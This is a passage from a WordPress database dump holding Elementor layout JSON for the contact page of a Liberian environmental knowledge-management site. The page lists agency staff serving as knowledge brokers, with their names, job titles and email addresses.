Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5891ccb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/domah.png\",\"id\":3659}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>Administrative Assistant, Office of the Minister<br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24742,3664,'_last_editor_used_jetpack','classic-editor'),(24743,1877,'_last_editor_used_jetpack','classic-editor'),(24744,3664,'_edit_lock','1618566679:42'),(24745,3664,'_edit_last','42'),(24753,3670,'_elementor_edit_mode','builder'),(24754,3670,'_elementor_template_type','wp-page'),(24755,3670,'_elementor_version','3.0.16'),(24756,3670,'_wp_page_template','default'),(24757,3670,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\